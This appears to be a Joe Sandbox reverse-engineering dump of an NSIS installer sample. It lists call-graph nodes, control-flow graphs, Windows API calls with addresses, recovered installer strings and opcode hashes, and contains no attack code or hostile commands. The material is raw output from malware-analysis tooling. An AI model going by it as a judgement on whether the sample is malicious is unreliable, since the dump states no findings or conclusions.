5092->5087 5097 406751 2 API calls 5092->5097 5098 404785 5092->5098 5094 40473f GetDiskFreeSpaceW 5093->5094 5096 404763 MulDiv 5094->5096 5094->5098 5096->5098 5097->5092 5100 4047e2 5098->5100 5101 4043ad 21 API calls 5098->5101 5099 404805 5116 403d85 KiUserCallbackDispatcher 5099->5116 5100->5099 5102 40141d 80 API calls 5100->5102 5103 4047d3 5101->5103 5102->5099 5105 4047e4 SetDlgItemTextW 5103->5105 5106 4047d8 5103->5106 5105->5100 5107 4043ad 21 API calls 5106->5107 5107->5100 5108 404821 5108->5109 5117 403d61 5108->5117 5109->5058 5111->5048 5112->5084 5113->5061 5114->5081 5115->5091 5116->5108 5118 403d74 SendMessageW 5117->5118 5119 403d6f 5117->5119 5118->5109 5119->5118 5120 402da5 5121 4030e3 5120->5121 5122 402dac 5120->5122 5123 401446 18 API calls 5122->5123 5124 402db8 5123->5124 5125 402dbf SetFilePointer 5124->5125 5125->5121 5126 402dcf 5125->5126 5126->5121 5128 405f51 wsprintfW 5126->5128 5128->5121 5129 4030a9 SendMessageW 5130 4030c2 InvalidateRect 5129->5130 5131 4030e3 5129->5131 5130->5131 5132 401cb2 5133 40145c 18 API calls 5132->5133 5134 401c54 5133->5134 5135 4062a3 11 API calls 5134->5135 5138 401c64 5134->5138 5136 401c59 5135->5136 5137 406c9b 81 API calls 5136->5137 5137->5138 4088 4021b5 4089 40145c 18 API calls 4088->4089 4090 4021bb 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021c4 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021cd 4093->4094 4095 40145c 18 API calls 4094->4095 4096 4021d6 4095->4096 4097 404f72 25 API calls 4096->4097 4098 4021e2 ShellExecuteW 4097->4098 4099 40221b 4098->4099 4100 40220d 4098->4100 4102 4062a3 11 API calls 4099->4102 4101 4062a3 11 API calls 4100->4101 4101->4099 4103 402230 4102->4103 5146 402238 5147 40145c 18 API calls 5146->5147 5148 40223e 5147->5148 5149 4062a3 11 API calls 5148->5149 5150 40224b 5149->5150 5151 404f72 25 API calls 5150->5151 5152 402255 5151->5152 5153 405c3f 2 API calls 5152->5153 5154 40225b 5153->5154 5155 4062a3 11 API calls 5154->5155 5158 4022ac CloseHandle 5154->5158 5161 40226d 5155->5161 5157 4030e3 5158->5157 5159 402283 WaitForSingleObject 5160 402291 GetExitCodeProcess 5159->5160 5159->5161 5160->5158 5163 4022a3 5160->5163 5161->5158 5161->5159 5162 406332 2 API calls 5161->5162 5162->5159 5165 405f51 wsprintfW 5163->5165 5165->5158 5166 4040b8 5167 4040d3 5166->5167 5175 404201 5166->5175 5171 40410e 5167->5171 5197 403fca WideCharToMultiByte 5167->5197 5168 40426c 5169 404276 GetDlgItem 5168->5169 5170 40433e 5168->5170 5172 404290 5169->5172 5173 4042ff 5169->5173 5176 403dca 8 API calls 5170->5176 5178 403d3f 19 API calls 5171->5178 5172->5173 5181 4042b6 6 API calls 5172->5181 5173->5170 5182 404311 5173->5182 5175->5168 5175->5170 5177 40423b GetDlgItem SendMessageW 5175->5177 5180 404339 5176->5180 5202 403d85 KiUserCallbackDispatcher 5177->5202 5179 40414e 5178->5179 5184 403d3f 19 API calls 5179->5184 5181->5173 5185 404327 5182->5185 5186 404317 SendMessageW 5182->5186 5189 40415b CheckDlgButton 5184->5189 5185->5180 5190 40432d SendMessageW 5185->5190 5186->5185 5187 404267 5188 403d61 SendMessageW 5187->5188 5188->5168 5200 403d85 KiUserCallbackDispatcher 5189->5200 5190->5180 5192 404179 GetDlgItem 5201 403d98 SendMessageW 5192->5201 5194 40418f SendMessageW 5195 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5194->5195 5196 4041ac GetSysColor 5194->5196 5195->5180 5196->5195 5198 404007 5197->5198 5199 403fe9 GlobalAlloc WideCharToMultiByte 5197->5199 5198->5171 5199->5198 5200->5192 5201->5194 5202->5187 4197 401eb9 4198 401f24 4197->4198 4199 401ec6 4197->4199 4200 401f53 GlobalAlloc 4198->4200 4201 401f28 4198->4201 4202 401ed5 4199->4202 4209 401ef7 4199->4209 4203 406805 18 API calls 4200->4203 4208 4062a3 11 API calls 4201->4208 4213 401f36 4201->4213 4204 4062a3 11 API calls 4202->4204 4207 401f46 4203->4207 4205 401ee2 4204->4205 4210 402708 4205->4210 4215 406805 18 API calls 4205->4215 4207->4210 4211 402387 GlobalFree 4207->4211 4208->4213 4219 406009 lstrcpynW 4209->4219 4211->4210 4221 406009 lstrcpynW 4213->4221 4214 401f06 4220 406009 lstrcpynW 4214->4220 4215->4205 4217 401f15 4222 406009 lstrcpynW 4217->4222 4219->4214 4220->4217 4221->4207 4222->4210 5203 4074bb 5205 407344 5203->5205 5204 407c6d 5205->5204 5206 4073c2 GlobalFree 5205->5206 5207 4073cb GlobalAlloc 5205->5207 5208 407443 GlobalAlloc 5205->5208 5209 40743a GlobalFree 5205->5209 5206->5207 5207->5204 5207->5205 5208->5204 5208->5205 5209->5208

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                  • GetClientRect.USER32(?,?), ref: 00405196
                                                  • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                  • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                    • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                  • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                  • ShowWindow.USER32(00000000), ref: 004052E7
                                                  • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                  • ShowWindow.USER32(00000008), ref: 00405333
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                  • CreatePopupMenu.USER32 ref: 00405376
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                  • GetWindowRect.USER32(?,?), ref: 0040539E
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                  • OpenClipboard.USER32(00000000), ref: 0040540B
                                                  • EmptyClipboard.USER32 ref: 00405411
                                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                  • CloseClipboard.USER32 ref: 0040546E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                  • String ID: @rD$New install of "%s" to "%s"${
                                                  • API String ID: 2110491804-2409696222
                                                  • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                  • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                  • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                  • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                  APIs
                                                  • #17.COMCTL32 ref: 004038A2
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                  • OleInitialize.OLE32(00000000), ref: 004038B4
                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                  • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                  • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                  • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                  • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                  • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                  • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                  • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                  • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                  • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                  • ExitProcess.KERNEL32 ref: 00403AF1
                                                  • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                  • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                  • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                  • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                  • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                  • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                  • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                  • API String ID: 2435955865-239407132
                                                  • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                  • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                  • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                  • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 787 4074bb-4074c0 788 4074c2-4074ef 787->788 789 40752f-407547 787->789 791 4074f1-4074f4 788->791 792 4074f6-4074fa 788->792 790 407aeb-407aff 789->790 796 407b01-407b17 790->796 797 407b19-407b2c 790->797 793 407506-407509 791->793 794 407502 792->794 795 4074fc-407500 792->795 798 407527-40752a 793->798 799 40750b-407514 793->799 794->793 795->793 800 407b33-407b3a 796->800 797->800 803 4076f6-407713 798->803 804 407516 799->804 805 407519-407525 799->805 801 407b61-407c68 800->801 802 407b3c-407b40 800->802 818 407350 801->818 819 407cec 801->819 807 407b46-407b5e 802->807 808 407ccd-407cd4 802->808 810 407715-407729 803->810 811 40772b-40773e 803->811 804->805 806 407589-4075b6 805->806 814 4075d2-4075ec 806->814 815 4075b8-4075d0 806->815 807->801 812 407cdd-407cea 808->812 816 407741-40774b 810->816 811->816 817 407cef-407cf6 812->817 820 4075f0-4075fa 814->820 815->820 821 40774d 816->821 822 4076ee-4076f4 816->822 823 407357-40735b 818->823 824 40749b-4074b6 818->824 825 40746d-407471 818->825 826 4073ff-407403 818->826 819->817 829 407600 820->829 830 407571-407577 820->830 831 407845-4078a1 821->831 832 4076c9-4076cd 821->832 822->803 828 407692-40769c 822->828 823->812 833 407361-40736e 823->833 824->790 838 407c76-407c7d 825->838 839 407477-40748b 825->839 844 407409-407420 826->844 845 407c6d-407c74 826->845 834 4076a2-4076c4 828->834 835 407c9a-407ca1 828->835 847 407556-40756e 829->847 848 407c7f-407c86 829->848 836 40762a-407630 830->836 837 40757d-407583 830->837 831->790 840 407c91-407c98 832->840 841 4076d3-4076eb 832->841 833->819 849 407374-4073ba 833->849 834->831 835->812 850 40768e 836->850 851 407632-40764f 836->851 837->806 837->850 838->812 846 40748e-407496 839->846 840->812 841->822 852 407423-407427 844->852 845->812 846->825 856 407498 846->856 847->830 848->812 854 4073e2-4073e4 849->854 855 4073bc-4073c0 849->855 850->828 857 407651-407665 851->857 858 407667-40767a 851->858 852->826 853 407429-40742f 852->853 860 407431-407438 853->860 861 407459-40746b 853->861 864 4073f5-4073fd 854->864 865 4073e6-4073f3 854->865 862 4073c2-4073c5 GlobalFree 855->862 863 4073cb-4073d9 GlobalAlloc 855->863 856->824 859 40767d-407687 857->859 858->859 859->836 866 407689 859->866 867 407443-407453 GlobalAlloc 860->867 868 40743a-40743d GlobalFree 860->868 861->846 862->863 863->819 869 4073df 863->869 864->852 865->864 865->865 871 407c88-407c8f 866->871 872 40760f-407627 866->872 867->819 867->861 868->867 869->854 871->812 872->836
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                  • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                  • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                  • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                  • String ID:
                                                  • API String ID: 310444273-0
                                                  • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                  • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                  • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                  • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                  • FindClose.KERNEL32(00000000), ref: 004062EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                  • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                  • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                  • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                  • ShowWindow.USER32(?), ref: 004054D2
                                                  • DestroyWindow.USER32 ref: 004054E6
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                  • GetDlgItem.USER32(?,?), ref: 00405523
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                  • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                  • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                  • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                  • GetDlgItem.USER32(?,00000003), ref: 00405708
